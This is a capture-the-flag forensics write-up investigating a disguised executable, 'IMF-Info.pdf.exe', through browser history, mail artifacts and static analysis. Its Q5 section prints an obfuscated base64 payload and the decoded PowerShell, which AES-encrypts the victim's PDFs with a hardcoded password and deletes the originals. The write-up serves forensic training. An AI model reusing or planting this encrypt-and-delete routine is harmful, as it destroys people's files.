You can read this writeup on my GitBook account Link

Scenario

The IMF is hit by a cyber attack compromising sensitive data. Luther sends Ethan to retrieve crucial information from a compromised server. Despite warnings, Ethan downloads the intel, which later becomes unreadable. To recover it, he creates a forensic image and asks Benji for help in decoding the files.

Resources:

• Windows Mail Artifacts: Microsoft HxStore.hxd (email) Research

Q1: What is the MD5 hash of the potentially malicious EXE file the user downloaded?

After opening the downloaded artifacts file with FTK Imager, we are for an executable “.exe” file that seems malicious.

We can see a malicious file in “/Downloads” called “IMF-Info.pdf.exe”

Of course it's not a normal file, so we can get it’s hash using the following option:

we are downloading the file hash list of all files inside the “/Downloads” directory, rather than download the malicious file itself and get its hash

open the saved .csv file, and get the MD5 hash for “IMF-Info.pdf.exe” file

Answer1 → 336A7CF476EBC7548C93507339196ABB

Q2: What is the URL from which the file was downloaded?

If you click on “Downloads” directory, you can view the “Zone.Identifier” file for specific files inside the directory

Opening the “Zone.Identifier” file for “IMF-Info.pdf.exe” to get the

Answer2 → http://192.168.16.128:8000/IMF-Info.pdf.exe

Q3: What application did the user use to download this file?

Viewing the file system hierarchy, we can see the device have these 2 most famous browser applications:

So, focusing on the history database for each history file of them:

Google Chrome History file location:

C:\Users\<username>\AppData\Local\Google\Chrome\User Data\Default\History

Microsoft Edge History file location:

C:\Users\<username>\AppData\Local\Microsoft\Edge\User Data\Default\History

After analyzing each file, we can see that the user accessed this url

Also the Malicious file was found in download table from History database

Answer3 → Microsoft Edge

Q4: By examining Windows Mail artifacts, we found an email address mentioning three IP addresses of servers that are at risk or compromised. What are the IP addresses?

This question is very tricky, in fact its not about getting the email databses or emails from “/comm”. It’s about reading the Scenario again, and try to understand what was in the scenario resources:

Resources:

• Windows Mail Artifacts: Microsoft HxStore.hxd (email) Research

After reading this article, now we need to get “.hxd” file and try to analyze it using “HxD” tool.

finally found the silly “.hxd” file with pathC:\Users\<username>\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\hxStore.hxd

And install that .hxd file “Export Files” and analyze it using “HxD”.

open the downloaded file using “HxD” , finding the same header in blog

So it’s about how to search for the ip addresses, try to make this filter:

check on “Search all” and take a look at all search hits:

double click to the blue search hit, you can get the ip addresses easily:

Answer4 → 145.67.29.88, 212.33.10.112, 192.168.16.128

Q5: By examining the malicious executable, we found that it uses an obfuscated script to decrypt specific files.
What predefined password does the script use for encryption?

At this stage we need to download the malicious file and try to run static malware analysis on the malicious file (be aware to use safe environment)

After downloading the malicious file, we need to run “strings” on the file and redirect all strings inside a text file using something like this command:

.\strings.exe "D:\CYBERDEFENDERS\Silent_Breach\Downloads\IMF-Info.pdf.exe" > file.txt

open the output file on Notepad++ for a better view, and try to see anything catchy. Found Nothing at all TBH :(

Now i got an idea to see the static analysis for the malicious file on Virustotal, upload the file, and see the yara rules that matched

Any of the High Crowd sourced Sigma Rules can lead you, just see the “View matches” tab and see the full command line executed:

this .ps1 file seems very malicious, so let’s take a look at the strings output file we exported using “strings” tool. search for the “Gz3m6mG3j2TyAqF2Zx4v.ps1” file in Notepad++

which is make sense, as he said in the question it is a script so, “Gz3m6mG3j2TyAqF2Zx4v.ps1" is a powershell script, so we could've searched for any .ps1 script and we will get this powershell script also!!

Found only 1 search hit. And also found a malicious obfuscated code right below the “Gz3m6mG3j2TyAqF2Zx4v.ps1" file

So, using a simple python code to obfuscate that very loooong string starts with “K0QfK0QZjJ3bG1CIl”:

import base64
obfuscated = """K0QfK0QZjJ3bG1CIlxWaGRXdw5WakASblRXStUmdv1WZSBCIgAiCNoQDpgSZz9GbD5SbhVmc0NFd19GJgACIgoQDpgSZz9GbD5SbhVmc0N1b0BXeyNGJgACIgoQDK0QKos2YvxmQsFmbpZEazVHbG5SbhVmc0N1b0BXeyNGJgACIgoQDpgGdn5WZM5yclRXeC5WahxGckACLwACLzVGd5JkbpFGbwRCKlRXaydlLtFWZyR3UvRHc5J3YkACIgAiCNoQDpUGdpJ3V6oTXlR2bN1WYlJHdT9GdwlncD5SeoBXYyd2b0BXeyNkL5RXayV3YlNlLtVGdzl3UbBCLy9Gdwlncj5WZkACLtFWZyR3U0V3bkgSbhVmc0N1b0BXeyNkL5hGchJ3ZvRHc5J3QukHdpJXdjV2Uu0WZ0NXeTBCdjVmai9UL3VmTg0DItFWZyR3UvRHc5J3YkACIgAiCNkSZ0FWZyNkO60VZk9WTlxWaG5yTJ5SblR3c5N1WgwSZslmR0VHc0V3bkgSbhVmc0NVZslmRu8USu0WZ0NXeTBCdjVmai9UL3VmTg0DItFWZyR3U0V3bkACIgAiCNoQDpUGbpZEd1BnbpRCKzVGd5JEbsFEZhVmU6oTXlxWaG5yTJ5SblR3c5N1Wg0DIzVGd5JkbpFGbwRCIgACIK0gCNkCKy9Gdwlncj5WRlRXYlJ3QuMXZhRCI9AicvRHc5J3YuVGJgACIgoQDK0wNTN0SQpjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1Wg0DIn5WakRWYQ5yclFGJgACIgoQDDJ0Q6oTXlR2bNJXZoBXaD5SeoBXYyd2b0BXeyNkL5RXayV3YlNlLtVGdzl3UbBSPgUGZv1kLzVWYkACIgAiCNYXakASPgYVSuMXZhRCIgACIK0QeltGJg0DI5V2SuMXZhRCIgACIK0QKoUGdhVmcDpjOdNXZB5SeoBXYyd2b0BXeyNkL5RXayV3YlNlLtVGdzl3UbBSPgMXZhRCIgACIK0gCNcyYuVmLnACLnQiZkBnLcdCIlNWYsBXZy1CIlxWaGRXdw5WakASPgUGbpZEd1BHd19GJgACIgoQD7BSKzVGbpZEd1BnbpRCIulGIlxWaGRXdw5WakgCIoNWYlJ3bmpQDK0QKK0gImRGcu42bpN3cp1ULG1UScxFcvR3azVGRcxlbhhGdlxFXzJXZzVFXcpzQiACIgAiCNwiImRGcuQXZyNWZT1iRNlEXcB3b0t2clREXc5WYoRXZcx1cyV2cVxFX6MkIgACIgoQDoAEI9AyclxWaGRXdw5WakoQDzVGbpZGI0VHculGIm9GI0NXaMByIK0gCNkSZ6l2U2lGJoMXZ0lnQ0V2RuMXZ0lnQlZXayVGZkASPgYXakoQDpUmepNVeltGJoMXZ0lnQ0V2RuMXZ0lnQlZXayVGZkASPgkXZrRiCNkycu9Wa0FmclRXakACL0xWYzRCIsQmcvd3czFGckgyclRXeCVmdpJXZEhTO4IzYmJlL5hGchJ3ZvRHc5J3QukHdpJXdjV2Uu0WZ0NXeTBCdjVmai9UL3VmTg0DIzVGd5JUZ2lmclRGJK0gCNAiNxASPgUmepNldpRiCNACIgIzMg0DIlpXaTlXZrRiCNADMwATMg0DIz52bpRXYyVGdpRiCNkCOwgHMscDM4BDL2ADewwSNwgHMsQDM4BDLzADewwiMwgHMsEDM4BDKd11WlRXeCtFI9ACdsF2ckoQDiQyYlNVNyAjMj8mZuFiZtlkIg0DIkJ3b3N3chBHJ"""
# Reverse it
reversed_base64 = obfuscated[::-1]
# Decode from Base64
decoded = base64.b64decode(reversed_base64)
# Try to print the result as UTF-8
try:
    print(decoded.decode('utf-8'))
except UnicodeDecodeError:
    print("[!] Could not decode fully. Might be binary or further obfuscated.")

OR, using cyberchef , by reading the obfuscated code, we can see that it reverse the long string and decode it with base64 decoder

do the same filter on cyberchef with the same order just like this, then add that very long string that starts with “K0QfK0QZjJ3bG1CIl”:

# ====================================
# Decoded Powershell script
# ====================================
 $password = "Imf!nfo#2025Sec$"
$salt = [Byte[]](0x01,0x02,0x03,0x04,0x05,0x06,0x07,0x08)
$iterations = 10000
$keySize = 32   
$ivSize = 16 
$deriveBytes = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($password, $salt, $iterations)
$key = $deriveBytes.GetBytes($keySize)
$iv = $deriveBytes.GetBytes($ivSize)
# List of input files
$inputFiles = @(
    "C:\\Users\\ethan\\Desktop\\IMF-Secret.pdf",
    "C:\\Users\\ethan\\Desktop\\IMF-Mission.pdf"
)
foreach ($inputFile in $inputFiles) {
    $outputFile = $inputFile -replace '\.pdf$', '.enc'
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Key = $key
    $aes.IV = $iv
    $aes.Mode = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $encryptor = $aes.CreateEncryptor()
    $plainBytes = [System.IO.File]::ReadAllBytes($inputFile)
    $outStream = New-Object System.IO.FileStream($outputFile, [System.IO.FileMode]::Create)
    $cryptoStream = New-Object System.Security.Cryptography.CryptoStream($outStream, $encryptor, [System.Security.Cryptography.CryptoStreamMode]::Write)
    $cryptoStream.Write($plainBytes, 0, $plainBytes.Length)
    $cryptoStream.FlushFinalBlock()
    $cryptoStream.Close()
    $outStream.Close()
    Remove-Item $inputFile -Force
}

Answer5 → Imf!nfo#2025Sec$

Q6: After identifying how the script works, decrypt the files and submit the secret string.

Now we need to decrypt encrypted file, these are the files on “/Desktop” :

Dump these encrypted files that ends with “.enc” , and try to decrypt them.

With a little help from ChatGPT, we can make a powershell script to decrypt the dropped encrypted file:

# ====================================
# AES Decryption Script for .enc Files
# ====================================
# --- Configuration ---
$password = "Imf!nfo#2025Sec$"
$salt = [Byte[]](0x01,0x02,0x03,0x04,0x05,0x06,0x07,0x08)
$iterations = 10000
$keySize = 32
$ivSize = 16
# Derive Key and IV
$deriveBytes = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($password, $salt, $iterations)
$key = $deriveBytes.GetBytes($keySize)
$iv = $deriveBytes.GetBytes($ivSize)
# --- Input Files (Update these paths) ---
$inputFiles = @(
    "D:\CYBERDEFENDERS\Silent_Breach\IMF-Secret.enc",
    "D:\CYBERDEFENDERS\Silent_Breach\IMF-Mission.enc"
)
foreach ($encFile in $inputFiles) {
    if (-not (Test-Path $encFile)) {
        Write-Warning "File not found: $encFile"
        continue
    }
    # Generate output path: replace .enc with .decrypted.pdf
    $outputFile = $encFile -replace '\.enc$', '.decrypted.pdf'
    try {
        # Set up AES decryption
        $aes = [System.Security.Cryptography.Aes]::Create()
        $aes.Key = $key
        $aes.IV = $iv
        $aes.Mode = [System.Security.Cryptography.CipherMode]::CBC
        $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
        $decryptor = $aes.CreateDecryptor()
        # Read encrypted data
        $cipherBytes = [System.IO.File]::ReadAllBytes($encFile)
        # Create streams for decryption
        $inStream = [System.IO.MemoryStream]::new([byte[]] $cipherBytes)
        $cryptoStream = New-Object System.Security.Cryptography.CryptoStream($inStream, $decryptor, [System.Security.Cryptography.CryptoStreamMode]::Read)
        $buffer = New-Object byte[] $cipherBytes.Length
        $read = $cryptoStream.Read($buffer, 0, $buffer.Length)
        [System.IO.File]::WriteAllBytes($outputFile, $buffer[0..($read - 1)])
        $cryptoStream.Close()
        $inStream.Close()
        Write-Host "✅ Decrypted: $outputFile" -ForegroundColor Green
    }
    catch {
        Write-Error "❌ Failed to decrypt $encFile. Error: $_"
    }
}

To run this script you can do the following :

Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass
# This command is to make your current PowerShell session run scripts freely.
./decrypt.ps1
# to run the powershell script freely

Finally, let's check the PDF files. Flag is hidden in the IMF-Mission.pdf file: